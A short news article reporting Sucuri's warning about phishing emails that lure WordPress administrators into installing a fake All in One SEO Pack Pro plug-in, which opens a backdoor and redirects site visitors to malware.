Germany’s Heise Online reports that security firm Sucuri is warning of a wave of phishing emails intended to trick WordPress administrators into installing a plug-in which serves up malware to site visitors. The email ostensibly offers site administrators the Pro version of the popular All in One SEO Pack plug-in free of charge.
However, anyone clicking on the email’s download link isn’t taken to the official WordPress plug-in page, but to a spammer-infested domain in Australia (.com.au) or Brazil (.com.br). At least administrators should be taken aback by now! According to Sucuri, some of their customers have nevertheless actually installed the malicious plug-in. This results in the malicious code opening a backdoor on the server giving the attackers full access and replacing the infected blog’s index.php file.
Once installed, the criminals behind the fake plug-in can insert any code they like into their victim’s website and attempt to attack visitors’ computers. Several versions of the malicious plug-in relay visitors to pornography site or other servers which also attempt to install malware on victims’ computers.
Due to its widespread use, WordPress is a favourite target for hackers who attempt to misuse others’ websites for spam distribution or for DDoS attacks. There was such a DDoS attack recently on a forum in which thousands of legitimate WordPress sites were misused as part of the attack wave without the knowledge of their owners.